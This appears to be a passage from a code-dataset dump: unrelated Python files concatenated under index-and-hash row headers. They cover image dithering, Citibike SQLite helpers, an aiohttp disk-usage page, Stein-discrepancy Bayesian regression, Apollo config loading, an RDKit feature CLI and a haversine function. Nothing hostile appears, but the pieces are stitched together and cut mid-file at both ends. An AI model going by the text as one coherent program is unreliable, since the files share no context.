    for linha in range(img.altura):
        for coluna in range(img.largura):
            r, g, b = img[linha][coluna]
            if metodo == 'average':
                media = (r + g + b) / 3.0
                pixel = (media, media, media)
            elif metodo == 'r':
                pixel = (r, r, r)
            elif metodo == 'inv':
                pixel = (255 - r, 255 - g, 255 - b)
            else:
                pixel = (r, g, b)
            saida[linha][coluna] = pixel
    return saida
def balanco(img, ar, ag, ab):
    """Return a white-balance adjusted copy of *img*: each RGB channel is
    scaled by its own coefficient (ar, ag, ab) and truncated to int.

    BUG FIX: the original multiplied all three channels by *ar*, leaving
    the *ag* and *ab* parameters unused; green and blue now use their
    own coefficients as the signature promises.
    """
    nova = Imagem((img.altura, img.largura))
    for y in range(img.altura):
        for x in range(img.largura):
            r, g, b = img[y][x]
            R = int(ar * r)
            G = int(ag * g)  # was int(ar*g)
            B = int(ab * b)  # was int(ar*b)
            nova[y][x] = (R, G, B)
    return nova
def binaria(img):
    """Binarize *img* by clustering its pixels into 2 groups with k-means.

    A 1000-pixel random sample (fixed seed) fits the model; every pixel is
    then mapped to pure black or white from the palette.
    NOTE(review): which cluster becomes black vs. white depends on KMeans'
    arbitrary label order, so the polarity of the result is not guaranteed.
    """
    nova = img.copia()
    dados = img.arrLin()  # image as a flat list of pixels (row-major)
    paleta = [[0,0,0], [255,255,255]]
    nClusters = 2
    # sample 1000 shuffled pixels (deterministic seed) to keep fitting cheap
    amostraAleatoria = shuffle(dados, random_state=0)[:1000]
    km = KMeans(nClusters).fit(amostraAleatoria)
    labels = km.predict(dados)
    for x,label in enumerate(labels):
        # recover 2-D coordinates from the flat index
        i = x // img.largura
        j = x % img.largura
        r,g,b = paleta[label]
        nova[i][j] = (r,g,b)
    return nova
def propaga(tup, fator):
    """Spread *fator* of quantization error onto each channel of pixel *tup*."""
    vermelho, verde, azul = tup
    return (vermelho + fator, verde + fator, azul + fator)
# Floyd-Steinberg Dithering
def floyd(img):
    """Black/white dithering via Floyd-Steinberg error diffusion.

    Converts to grayscale first, thresholds each pixel at 127, and pushes
    the quantization error onto the yet-unvisited neighbors with the
    classic 7/16, 3/16, 5/16, 1/16 weights.
    """
    nova = mudaCor(img, 'average')  # TODO: switch to luminosity once implemented
    for y in range(img.altura):
        for x in range(img.largura):
            r,g,b = nova[y][x]
            # grayscale pixel, so r carries the intensity; threshold at 127
            if r >= 255//2:
                nova[y][x] = (255, 255, 255)
            else:
                nova[y][x] = (0, 0, 0)
            # signed error between the old intensity and the chosen extreme
            quantErro = r - nova[y][x][0]
            # diffuse the error to the right / lower-left / below / lower-right
            if x+1 < img.largura:
                nova[y][x+1] = propaga(nova[y][x+1], quantErro * 7/16)
            if y+1 < img.altura:
                if x-1 >= 0:
                    nova[y+1][x-1] = propaga(nova[y+1][x-1], quantErro * 3/16)
                nova[y+1][x] = propaga(nova[y+1][x], quantErro * 5/16)
                if x+1 < img.largura:
                    nova[y+1][x+1] = propaga(nova[y+1][x+1], quantErro * 1/16)
    return nova
# Ordered dithering with a Bayer-style threshold matrix
def bayer(img):
    """Black/white ordered dithering: each pixel's gray level is compared
    against a 2x2 tiled threshold matrix (position-dependent cutoff)."""
    matriz = np.array([[0,60], [45, 110]])
    dim = matriz.shape[0]
    nova = Imagem((img.altura, img.largura))
    for y in range(img.altura):
        for x in range(img.largura):
            r,g,b = img[y][x]
            # channel-mean gray level; TODO: switch to luminosity once implemented
            Y = (r + g + b) / 3.0
            # the matrix tiles over the image via the modulo indices
            if Y > matriz[y % dim][x % dim]:
                nova[y][x] = (255, 255, 255)
            else:
                nova[y][x] = (0, 0, 0)
    return nova
4,835 | 9b8b196e1ad845ab745dabe5abe3be7bea0d5695 | import csv
import sqlite3
import time
from datetime import datetime, timedelta
import pandas as pd
import pytz
import json
import urllib
import numpy as np
# Absolute path of the SQLite database used by the helpers below.
DATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'
def execute_query(cur, query, args=()):
    """Run *query* with parameters *args* on cursor *cur*; return all rows."""
    return cur.execute(query, args).fetchall()
def convertTime(et):
    """Normalize "YYYY-MM-DD hh:mm:ss AM/PM" to 24-hour "YYYY-MM-DD HH:mm:ss".

    E.g. '2017-06-01 11:41:53 PM' -> '2017-06-01 23:41:53'.  Strings that
    are already 24-hour (or 12 PM / non-12 AM) are simply truncated to the
    first 19 characters.
    """
    hour = int(et[11:13])
    if 'PM' in et and hour != 12:
        # afternoon: shift hour into the 13..23 range
        return et[:10] + ' ' + str(hour + 12) + et[13:19]
    if 'AM' in et and hour == 12:
        # midnight: 12 AM becomes 00
        return et[:10] + ' 00' + et[13:19]
    return et[:19]
def getNYtimenow():
    """Current wall-clock time in New York as a 'YYYY-MM-DD hh:mm:ss' string."""
    ny_zone = pytz.timezone('America/New_York')
    return str(datetime.now(ny_zone))[:19]
def datetimeStringToObject(timeString):
    """Parse 'YYYY-MM-DD hh:mm:ss' into a datetime; seconds are discarded
    (only year..minute are read, matching the original slicing).

    Returns None when the input is missing or malformed.
    FIX: the bare `except:` - which also swallowed KeyboardInterrupt and
    SystemExit - is narrowed to the errors slicing/int()/datetime() can
    actually raise here.
    """
    try:
        year = int(timeString[:4])
        month = int(timeString[5:7])
        day = int(timeString[8:10])
        hour = int(timeString[11:13])
        minute = int(timeString[14:16])
        return datetime(year, month, day, hour, minute)
    except (TypeError, ValueError):
        # TypeError: non-string input (e.g. None); ValueError: bad digits
        # or an out-of-range date component.
        return None
def timeStringToObject(timeString):
    """Combine today's date with an 'hh:mm:ss' string (seconds are ignored).

    Returns a datetime at today's date with the given hour/minute, or
    None when the string cannot be parsed.
    """
    try:
        hora = int(timeString[:2])
        minuto = int(timeString[3:5])
        return datetime.today().replace(hour=hora, minute=minuto, second=0, microsecond=0)
    except:
        # mirrors the original's catch-all: any parse failure yields None
        return None
def notSignedIn(vID):
    """True when the driver has not yet entered a vehicle ID.

    An unset vehicle ID is stored as 0 (or the string '0').
    """
    return str(vID) == '0'
def resetEstComp(cur, vID):
    """Clear (set to NULL) estComplete for all of vehicle *vID*'s open tasks.

    Note: despite the original "goes to 0" wording, the SQL stores NULL.
    The caller is responsible for committing the transaction.
    """
    cur.execute("""UPDATE OpenTasks SET estComplete = null WHERE vID = ? """,[vID])
def getNextFixOrderNum(cur, vID):
    """Order number for the vehicle's next fixed task: (# fixed tasks) + 1."""
    fixed_count = execute_query(
        cur, """SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1""", [vID])[0][0]
    return int(fixed_count) + 1
def getNextOrderNum(cur, vID):
    """Order number for the vehicle's next task: (# open tasks) + 1."""
    task_count = execute_query(cur, """SELECT Count(*) FROM OpenTasks where vID = ?""", [vID])[0][0]
    return int(task_count) + 1
def fixOrderBeforeInsert(cur,vID,orderNum):
    """Increment later tasks' order number by 1, orderNum is the order of the inserted task
    should be called before inserting the task """
    # Shifts every task at or after the insertion point down by one slot so
    # the new task can take orderNum; caller commits the transaction.
    cur.execute("""UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?""",[vID, orderNum])
4,836 | 7c9b51ae7cde9c3a00888dac6df710b93af6dd7f | import os
import time
import re
import json
from os.path import join, getsize
from aiohttp import web
from utils import helper
# Opening markup for the per-directory usage table (Bootstrap classes).
TBL_HEAD = '''
<table class="table table-striped table-hover table-sm">
<thead>
<tr>
<th scope="col">Directory</th>
<th scope="col">Size</th>
</tr>
</thead>
<tbody>
'''

# Closing markup for the table above.
TBL_FOOTER = '''
</tbody>
</table>
'''


def stats_count_info(request):
    """Render an HTML fragment with the file count and per-directory disk
    usage of the database tree rooted at request.app['PATH-DB'].

    BUG FIX: the original emitted TBL_FOOTER once per table row (inside
    the loop) and never closed its <tr> elements, producing invalid HTML;
    rows are now closed and the footer is appended once, after the loop.
    """
    root_path = request.app['PATH-DB']
    total_files = 0
    listed_sizes = dict()  # directories shown in the table
    dirs_data = dict()     # cumulative size of every directory (incl. .meta)
    for root, dirs, files in os.walk(root_path, topdown=False):
        total_files += len(files)
        size = sum(getsize(join(root, name)) for name in files)
        # bottom-up walk guarantees all children are already in dirs_data
        subdir_size = sum(dirs_data[join(root, d)] for d in dirs)
        size = dirs_data[root] = size + subdir_size
        if root.find('.meta') != -1:
            # internal meta directories contribute to totals but are not listed
            continue
        listed_sizes[root] = size
    ret = ''
    ret += "<h2>Files Count</h2>Number of files: {}<br /><br />".format(total_files)
    ret += "<h2>Disk Consumption</h2>"
    ret += "Database disk consumption overall: {} MB<br /><br />".format(
        listed_sizes[root_path] // (1024 * 1024))
    ret += "<h4>Resouce Usage Listed by Objects</h4><br />"
    ret += TBL_HEAD
    for k in sorted(listed_sizes, key=listed_sizes.get, reverse=True):
        ret += '<tr>'
        ret += "<td>{}</td><td>{}</td>".format(k, listed_sizes[k])
        ret += '</tr>'  # FIX: rows are now properly closed
    ret += TBL_FOOTER   # FIX: footer emitted once, after all rows
    return ret
def generate_disk_info_page(request):
    """Build the full disk-info HTML page and return it as an aiohttp response.

    The app-wide header/footer blobs come from the application registry;
    the stats fragment is rendered by stats_count_info above.
    """
    page = request.app['BLOB-HEADER']
    page += stats_count_info(request)
    page += request.app['BLOB-FOOTER']
    return web.Response(body=page, content_type='text/html')
def handle(request):
    """aiohttp route entry point for the disk-info page."""
    return generate_disk_info_page(request)
|
4,837 | f70f4f093aa64b8cd60acbb846855ca3fed13c63 | # ""
# "deb_char_cont_x9875"
# # def watch_edit_text(self): # execute when test edited
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# # logging.info("LEN : " + str(self.cmd_len))
# # if len(self.te_sql_cmd.toPlainText()) < self.cmd_len or \
# # self.te_sql_cmd.toPlainText().find(self.cmd_last_text) != 0:
# # # self.te_sql_cmd.setText(self.cmd_last_text) # not writch text
# #
# # # self.te_sql_cmd.setText(self.cmd_last_text) # Work but no text highLight
# # # after press backspace
# # # self.te_sql_cmd.setDocument(self.cmd_last_text_document)
# #
# # self.te_sql_cmd.setHtml(self.cmd_last_html_text)
# #
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# #
# # tempCurs = self.te_sql_cmd.textCursor()
# # # tempCurs=QTextCursor()
# # # tempCurs.movePosition(QTextCursor.Right,QTextCursor.MoveAnchor,len(self.te_sql_cmd.toPlainText()))
# #
# # tempCurs.movePosition(QTextCursor.End, QTextCursor.MoveAnchor, 0)
# # self.te_sql_cmd.setTextCursor(tempCurs)
#
#
# #
# # import subprocess
# # proc = subprocess.Popen('cmd.exe', stdin = subprocess.PIPE, stdout = subprocess.PIPE)
# #
#
# app=QApplication(sys.argv)
# window=AbtTerminal()
#
# def my_commands_ana(command):
# if command == "cd":
# # return str(os.path.dirname(os.path.realpath(__file__))) # current file Directory
# return os.getcwd()
# if "cd" in command[:2] and len(command) > 2:
# dir_name = command[3:]
# try:
# os.chdir(dir_name)
# return '<h4>dir changed to</h4> <h4 style="color:rgb(0,230,120);">%s</h4>' % os.getcwd()
# except:
# return '<h4 style="color:red">Cant change current Directory To \n\t%s</h4>' % dir_name
# if "$$" in command[:2]:
# stdout, stderr = proc.communicate(bytes(str(command[2:]), 'UTF-8'))
# deleted_length_before=len("b'Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n")
# deleted_length_after=len(">More? '")
# # real_result=str(stdout)[deleted_length_before+4:len(str(stdout))-deleted_length_after]
# real_result=str(stdout.decode("utf-8")).replace("Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n","")
# real_result=real_result.replace(">More?","")
# print(real_result)
# return real_result
#
#
#
#
#
# ###############
# import subprocess
# cmdline = ["cmd", "/q", "/k", "echo off"]
# cmd = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
#
#
# if "$$" in command[:2]:
# batch = b"""\
# cd
# """
#
# # cmd.stdin.write(bytes(str(command[2:]), 'UTF-8'))
#
# cmd.stdin.write(batch)
# cmd.stdin.flush() # Must include this to ensure data is passed to child process
# result = cmd.stdout.read()
# return " "
|
4,838 | a0a9527268fb5f8ea24de700f7700b874fbf4a6b | """
SteinNS: BayesianLogisticRegression_KSD.py
Created on 10/9/18 6:25 PM
@author: Hanxi Sun
"""
import tensorflow as tf
import numpy as np
import scipy.io
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
########################################################################################################################
# Data: covertype, column 0 is the label (classes {1, 2} -> {+1, -1}),
# remaining columns are features; a constant-1 column is appended as bias.
data = scipy.io.loadmat("data/covertype.mat")
X_input = data['covtype'][:, 1:]
y_input = data['covtype'][:, 0]
y_input[y_input == 2] = -1
N_all = X_input.shape[0]
X_input = np.hstack([X_input, np.ones([N_all, 1])])
d = X_input.shape[1]
X_dim = d + 1  # dimension of the target distribution
# split the data set into training and testing
X_train, X_test, y_train, y_test = train_test_split(X_input, y_input, test_size=0.2, random_state=21)
X_train_tf = tf.convert_to_tensor(X_train, dtype=tf.float64)
X_test_tf = tf.convert_to_tensor(X_test, dtype=tf.float64)
y_train_tf = tf.convert_to_tensor(y_train, dtype=tf.float64)
y_test_tf = tf.convert_to_tensor(y_test, dtype=tf.float64)
N = X_train.shape[0]
########################################################################################################################
# model parameters
lr = 4e-4  # learning rate
kernel = "rbf"  # "rbf" or "imq" kernel
z_dim = 100        # generator input (noise) dimension
h_dim_g = 200      # generator hidden width
mb_size_x = 100  # data mini-batch size
mb_size = 100  # sample mini-batch size
n_iter = 200000
iter_eval = 1000   # evaluate test accuracy every this many iterations
optimizer = tf.train.RMSPropOptimizer
########################################################################################################################
# network: 2-hidden-layer tanh generator mapping noise z -> posterior samples
tf.reset_default_graph()
initializer = tf.contrib.layers.xavier_initializer()
Xs = tf.placeholder(tf.float64, shape=[None, d])   # feature mini-batch
ys = tf.placeholder(tf.float64, shape=[None])      # label mini-batch
z = tf.placeholder(tf.float64, shape=[None, z_dim])  # generator noise
G_W1 = tf.get_variable('g_w1', [z_dim, h_dim_g], dtype=tf.float64, initializer=initializer)
G_b1 = tf.get_variable('g_b1', [h_dim_g], dtype=tf.float64, initializer=initializer)
G_W2 = tf.get_variable('g_w2', [h_dim_g, h_dim_g], dtype=tf.float64, initializer=initializer)
G_b2 = tf.get_variable('g_b2', [h_dim_g], dtype=tf.float64, initializer=initializer)
G_W3 = tf.get_variable('g_w3', [h_dim_g, X_dim], dtype=tf.float64, initializer=initializer)
G_b3 = tf.get_variable('g_b3', [X_dim], dtype=tf.float64, initializer=initializer)
# every trainable parameter of the generator
theta_G = [G_W1, G_b1, G_W2, G_b2, G_W3, G_b3]
########################################################################################################################
# functions & structures
def sample_z(m, n, sd=10.):
    """Draw an (m, n) matrix of generator noise ~ Normal(0, sd)."""
    return np.random.normal(loc=0, scale=sd, size=(m, n))
def S_q(theta, a0=1, b0=0.01):
    """Score function d log q(theta) / d theta for Bayesian logistic regression.

    theta rows are samples [w (d dims), s] with alpha = s**2 the prior
    precision; a0/b0 are the Gamma hyper-prior parameters.  Uses the
    placeholders Xs/ys (current data mini-batch) and rescales the data
    gradient by N / mb_size_x to unbias the mini-batch estimate.
    """
    # Reference:
    # https://github.com/DartML/Stein-Variational-Gradient-Descent/blob/master/python/bayesian_logistic_regression.py
    w = theta[:, :-1]  # (m, d)
    s = tf.reshape(theta[:, -1], shape=[-1, 1])  # (m, 1); alpha = s**2
    y_hat = 1. / (1. + tf.exp(- tf.matmul(Xs, tf.transpose(w))))  # (mx, m); shape(Xs) = (mx, d)
    y = tf.reshape((ys + 1.) / 2., shape=[-1, 1])  # (mx, 1); labels mapped {-1,1} -> {0,1}
    dw_data = tf.matmul(tf.transpose(y - y_hat), Xs)  # (m, d)
    dw_prior = - s**2 * w  # (m, d)
    dw = dw_data * N / mb_size_x + dw_prior  # (m, d)
    w2 = tf.reshape(tf.reduce_sum(tf.square(w), axis=1), shape=[-1, 1])  # (m, 1); = wtw
    ds = (2. * a0 - 2 + d) / s - tf.multiply(w2 + 2. * b0, s)  # (m, 1)
    return tf.concat([dw, ds], axis=1)
def rbf_kernel(x, dim=X_dim, h=1.):
    """RBF kernel matrix and the derivative terms needed for the KSD.

    Returns (kxy, dxkxy, dxykxy_tr): the kernel matrix, sum_y dk(x,y)/dx,
    and the trace of the mixed second derivative, for bandwidth *h*.
    """
    # Reference 1: https://github.com/ChunyuanLI/SVGD/blob/master/demo_svgd.ipynb
    # Reference 2: https://github.com/yc14600/svgd/blob/master/svgd.py
    XY = tf.matmul(x, tf.transpose(x))
    X2_ = tf.reshape(tf.reduce_sum(tf.square(x), axis=1), shape=[tf.shape(x)[0], 1])
    X2 = tf.tile(X2_, [1, tf.shape(x)[0]])
    pdist = tf.subtract(tf.add(X2, tf.transpose(X2)), 2 * XY)  # pairwise distance matrix
    kxy = tf.exp(- pdist / h ** 2 / 2.0)  # kernel matrix
    sum_kxy = tf.expand_dims(tf.reduce_sum(kxy, axis=1), 1)
    dxkxy = tf.add(-tf.matmul(kxy, x), tf.multiply(x, sum_kxy)) / (h ** 2)  # sum_y dk(x, y)/dx
    dxykxy_tr = tf.multiply((dim * (h**2) - pdist), kxy) / (h**4)  # tr( dk(x, y)/dxdy )
    return kxy, dxkxy, dxykxy_tr
def imq_kernel(x, dim=X_dim, beta=-.5, c=1.):
    """Inverse multiquadric kernel (c + ||x-y||^2)^beta and its KSD terms.

    Same return convention as rbf_kernel: (kxy, dxkxy, dxykxy_tr).
    """
    XY = tf.matmul(x, tf.transpose(x))
    X2_ = tf.reshape(tf.reduce_sum(tf.square(x), axis=1), shape=[tf.shape(x)[0], 1])
    X2 = tf.tile(X2_, [1, tf.shape(x)[0]])
    pdist = tf.subtract(tf.add(X2, tf.transpose(X2)), 2 * XY)  # pairwise distance matrix
    kxy = (c + pdist) ** beta
    # common factor of the first derivative
    coeff = 2 * beta * ((c + pdist) ** (beta-1))
    dxkxy = tf.matmul(coeff, x) - tf.multiply(x, tf.expand_dims(tf.reduce_sum(coeff, axis=1), 1))
    dxykxy_tr = tf.multiply((c + pdist) ** (beta - 2),
                            - 2 * dim * c * beta + (- 4 * beta ** 2 + (4 - 2 * dim) * beta) * pdist)
    return kxy, dxkxy, dxykxy_tr
# Kernel selected by the module-level `kernel` config string.
kernels = {"rbf": rbf_kernel,
           "imq": imq_kernel}
Kernel = kernels[kernel]


def ksd_emp(x, ap=1, dim=X_dim):
    """Empirical (V-statistic) kernelized Stein discrepancy of samples *x*.

    ap is passed to S_q as the Gamma hyper-parameter a0.
    """
    sq = S_q(x, ap)
    kxy, dxkxy, dxykxy_tr = Kernel(x, dim)
    t13 = tf.multiply(tf.matmul(sq, tf.transpose(sq)), kxy) + dxykxy_tr
    t2 = 2 * tf.trace(tf.matmul(sq, tf.transpose(dxkxy)))
    n = tf.cast(tf.shape(x)[0], tf.float64)
    # U-statistic alternative (diagonal removed), kept for reference:
    # ksd = (tf.reduce_sum(t13) - tf.trace(t13) + t2) / (n * (n-1))
    ksd = (tf.reduce_sum(t13) + t2) / (n ** 2)
    return ksd
def generator(z):
    """Map noise *z* through the 2-hidden-layer tanh network to samples.

    Note: the parameter deliberately shadows the module-level placeholder
    `z`; the output is scaled by 10 to widen the generator's range.
    """
    G_h1 = tf.nn.tanh(tf.matmul(z, G_W1) + G_b1)
    G_h2 = tf.nn.tanh(tf.matmul(G_h1, G_W2) + G_b2)
    out = 10. * tf.matmul(G_h2, G_W3) + G_b3
    return out
def evaluation(theta, X_t=X_test, y_t=y_test):
    """Posterior-averaged test accuracy and mean log-likelihood.

    theta rows are posterior samples [w (d dims), s]; only the weight part
    is used.  prob[i] is P(correct label) for test point i averaged over
    all posterior samples.
    """
    weights = theta[:, :-1]
    labels = y_t.reshape([-1, 1])
    # margin of each (sample, point) pair; negative margin -> low probability
    neg_margins = - np.matmul(labels * X_t, weights.T)
    prob = np.mean(1. / (1 + np.exp(neg_margins)), axis=1)
    accuracy = np.mean(prob > .5)
    log_lik = np.mean(np.log(prob))
    return accuracy, log_lik
# Wire the loss and optimizer: minimize the empirical KSD of generated samples.
G_sample = generator(z)
ksd = ksd_emp(G_sample)
solver_KSD = optimizer(learning_rate=lr).minimize(ksd, var_list=theta_G)
#######################################################################################################################
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# per-iteration loss plus periodic test-set metrics
ksd_loss = np.zeros(n_iter)
acc = np.zeros(1 + (n_iter // iter_eval))
loglik = np.zeros(1 + (n_iter // iter_eval))
for it in range(n_iter):
    # deterministic cyclic mini-batches over the training set
    batch = [i % N for i in range(it * mb_size_x, (it + 1) * mb_size_x)]
    X_b = X_train[batch, :]
    y_b = y_train[batch]
    _, loss_curr = sess.run([solver_KSD, ksd], feed_dict={Xs: X_b, ys: y_b, z: sample_z(mb_size, z_dim)})
    ksd_loss[it] = loss_curr
    if it % iter_eval == 0:
        # draw fresh posterior samples and score them on the held-out set
        post = sess.run(G_sample, feed_dict={z: sample_z(mb_size, z_dim)})
        post_eval = evaluation(post)
        acc[it // iter_eval] = post_eval[0]
        loglik[it // iter_eval] = post_eval[1]
# BUG FIX: the first figure plotted `ksd` (the TF tensor node) instead of
# the recorded per-iteration loss history `ksd_loss` that the axvline and
# title already use.
plt.plot(ksd_loss)
plt.axvline(np.argmin(ksd_loss), color="r")
plt.title("KSD loss (min={:.04f} at iter {})".format(np.min(ksd_loss), np.argmin(ksd_loss)))
plt.show()
plt.close()

# Test accuracy over training, with a 0.75 reference line.
plt.plot(np.arange(len(acc)) * iter_eval, acc)
plt.ylim(top=0.8)
plt.axhline(0.75, color="g")
plt.title("Accuracy (max={:0.4f} at iter {})".format(np.max(acc), np.argmax(acc)*iter_eval))
plt.show()
plt.close()
|
4,839 | 4b552731fcfc661c7ad2d63c7c47f79c43a8ae5e | #!/usr/bin/env python
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""Global config access."""
import os
import google.protobuf.text_format as text_format
import gflags
import glog
import modules.hmi.proto.config_pb2 as config_pb2
class Config(object):
    """Lazily-loaded global HMI configuration.

    The protobuf config is parsed exactly once from the file named by the
    ``--conf`` flag and cached on the class, together with name->entry
    lookup dicts for hardware, modules and tools.
    """
    pb_singleton = None
    hardware_dict = None
    module_dict = None
    tool_dict = None
    apollo_root = os.path.join(os.path.dirname(__file__), '../../..')

    @classmethod
    def get_pb(cls):
        """Parse the config file on first use and return the cached pb."""
        if cls.pb_singleton is None:
            with open(gflags.FLAGS.conf, 'r') as conf_file:
                cls.pb_singleton = text_format.Merge(conf_file.read(),
                                                     config_pb2.Config())
            glog.info('Get config: {}'.format(cls.pb_singleton))
        return cls.pb_singleton

    @classmethod
    def get_hardware(cls, hardware_name):
        """Return the hardware entry named *hardware_name*, or None."""
        if cls.hardware_dict is None:
            # Build the name -> entry index once, on first lookup.
            cls.hardware_dict = {entry.name: entry
                                 for entry in cls.get_pb().hardware}
        return cls.hardware_dict.get(hardware_name)

    @classmethod
    def get_module(cls, module_name):
        """Return the module entry named *module_name*, or None."""
        if cls.module_dict is None:
            cls.module_dict = {entry.name: entry
                               for entry in cls.get_pb().modules}
        return cls.module_dict.get(module_name)

    @classmethod
    def get_tool(cls, tool_name):
        """Return the tool entry named *tool_name*, or None."""
        if cls.tool_dict is None:
            cls.tool_dict = {entry.name: entry
                             for entry in cls.get_pb().tools}
        return cls.tool_dict.get(tool_name)

    @classmethod
    def get_realpath(cls, path_str):
        """Resolve *path_str* to a real path.

        Paths starting with '/' are absolute and returned unchanged;
        anything else is taken relative to the Apollo root.
        """
        if not path_str.startswith('/'):
            return os.path.abspath(os.path.join(cls.apollo_root, path_str))
        return path_str
|
4,840 | 4b63df35b36b35f1b886b8981519921a9e697a42 | #
# Copyright (C) 2005-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
import argparse
import re
import os
from rdkit import Chem
from rdkit import RDLogger
from rdkit.Chem import ChemicalFeatures
# RDKit logger used for per-line warnings about unparsable SMILES.
logger = RDLogger.logger()
# Column delimiters accepted in the SMILES input file: space, tab or comma.
splitExpr = re.compile(r'[ \t,]')
def GetAtomFeatInfo(factory, mol):
  """Return per-atom feature labels for *mol*.

  The result is a list with one slot per atom: either None (no features
  touch that atom) or a list of "Family-Type" label strings.
  """
  per_atom = [None] * mol.GetNumAtoms()
  for feat in factory.GetFeaturesForMol(mol):
    label = "%s-%s" % (feat.GetFamily(), feat.GetType())
    for atom_idx in feat.GetAtomIds():
      if per_atom[atom_idx] is None:
        per_atom[atom_idx] = []
      per_atom[atom_idx].append(label)
  return per_atom
def initParser():
  """Build and return the argparse parser for FeatFinderCLI.

  Argument order is preserved: -r / -n options, then the two positional
  file arguments (both validated for existence by ``existingFile``).
  """
  parser = argparse.ArgumentParser(
      description='Determine pharmacophore features of molecules',
      epilog=_splashMessage,
      formatter_class=argparse.RawDescriptionHelpFormatter)
  parser.add_argument(
      '-r', dest='reverseIt', default=False, action='store_true',
      help='Set to get atoms lists for each feature.')
  # Hidden option: cap the number of SMILES lines processed (-1 = no cap).
  parser.add_argument(
      '-n', dest='maxLines', default=-1, help=argparse.SUPPRESS, type=int)
  parser.add_argument(
      'fdefFilename', type=existingFile,
      help='Pharmacophore feature definition file')
  parser.add_argument(
      'smilesFilename', type=existingFile,
      help='The smiles file should have SMILES in the first column')
  return parser
_splashMessage = """
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
FeatFinderCLI
Part of the RDKit (http://www.rdkit.org)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
"""
def existingFile(filename):
  """ 'type' for argparse - check that filename exists """
  if os.path.exists(filename):
    return filename
  raise argparse.ArgumentTypeError("{0} does not exist".format(filename))
def processArgs(args, parser):
  """Perceive pharmacophore features for each SMILES line and print a report.

  With -r, prints one line per feature listing its atom ids; otherwise
  prints one line per atom listing the features that touch it.
  """
  try:
    factory = ChemicalFeatures.BuildFeatureFactory(args.fdefFilename)
  except Exception:
    parser.error("Could not parse Fdef file {0.fdefFilename}.".format(args))
  with open(args.smilesFilename) as smiles_file:
    for line_no, raw_line in enumerate(smiles_file, 1):
      if line_no == args.maxLines + 1:
        break  # -n line limit reached
      smi = splitExpr.split(raw_line.strip())[0].strip()
      mol = Chem.MolFromSmiles(smi)
      if mol is None:
        logger.warning("Could not process smiles '%s' on line %d." % (smi, line_no))
        continue
      print('Mol-%d\t%s' % (line_no, smi))
      if not args.reverseIt:
        # Per-atom view.
        for idx, atom_feats in enumerate(GetAtomFeatInfo(factory, mol)):
          print('\t% 2s(%d)' % (mol.GetAtomWithIdx(idx).GetSymbol(), idx + 1), end='')
          if atom_feats:
            print('\t', ', '.join(atom_feats))
          else:
            print()
      else:
        # Per-feature view.
        for feat in factory.GetFeaturesForMol(mol):
          print('\t%s-%s: ' % (feat.GetFamily(), feat.GetType()), end='')
          print(', '.join([str(a) for a in feat.GetAtomIds()]))
def main():
  """ Main application """
  cli_parser = initParser()
  processArgs(cli_parser.parse_args(), cli_parser)
# Script entry point.
if __name__ == '__main__':
  main()
|
4,841 | f3f5b14917c89c5bc2866dd56e212bd3ec8af1cd | import math
def Distance(t1, t2):
    """Great-circle (haversine) distance between two points.

    Args:
        t1, t2: (latitude, longitude) pairs in degrees.

    Returns:
        Distance in metres.
    """
    # FIX: the original comment claimed "mean radius in km"; 6371000 is metres.
    RADIUS = 6371000.  # earth's mean radius in metres
    lat1, lon1 = math.radians(t1[0]), math.radians(t1[1])
    lat2, lon2 = math.radians(t2[0]), math.radians(t2[1])
    d_lat = lat2 - lat1
    d_lon = lon2 - lon1
    a = (math.sin(d_lat / 2) * math.sin(d_lat / 2)
         + math.cos(lat1) * math.cos(lat2) * math.sin(d_lon / 2) * math.sin(d_lon / 2))
    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    return RADIUS * c
def tile_number(lon_deg, lat_deg, zoom):
    """Map (lon, lat) in degrees to integer (x, y) tile indices at *zoom*.

    NOTE(review): the y index uses a linear (plate carree) mapping of
    latitude, not the OSM/Web-Mercator tile formula — confirm intended.
    """
    tiles_per_axis = 2.0 ** zoom
    x_index = int((lon_deg + 180.0) / 360.0 * tiles_per_axis)
    y_index = int((lat_deg + 90.0) / 180.0 * tiles_per_axis)
    return (x_index, y_index)
4,842 | f720eaf1ea96ccc70730e8ba1513e1a2bb95d29d | import datetime
import time
import rfc822
from django.conf import settings
from urllib2 import Request, urlopen, URLError, HTTPError
from urllib import urlencode
import re
import string
try:
import django.utils.simplejson as json
except:
import json
from django.core.cache import cache
from tagging.models import Tag
from foodtruck.models import *
from foodtruck.tokens import *
import oauth2 as oauth
def fetch_json(url, service, list_key=None):
    """Fetch *url* and decode the body as JSON.

    If *list_key* is given, return only that top-level key's value.
    NOTE(review): the ``service`` argument is never used — confirm with callers.
    """
    payload = json.loads(urlopen(url).read())
    if list_key:
        payload = payload[list_key]
    return payload
def oauth_req(url, key, secret, http_method="GET", post_body=None, http_headers=None):
    """Perform an OAuth1-signed HTTP request and return the raw response body.

    NOTE(review): the consumer is always built from the module-level
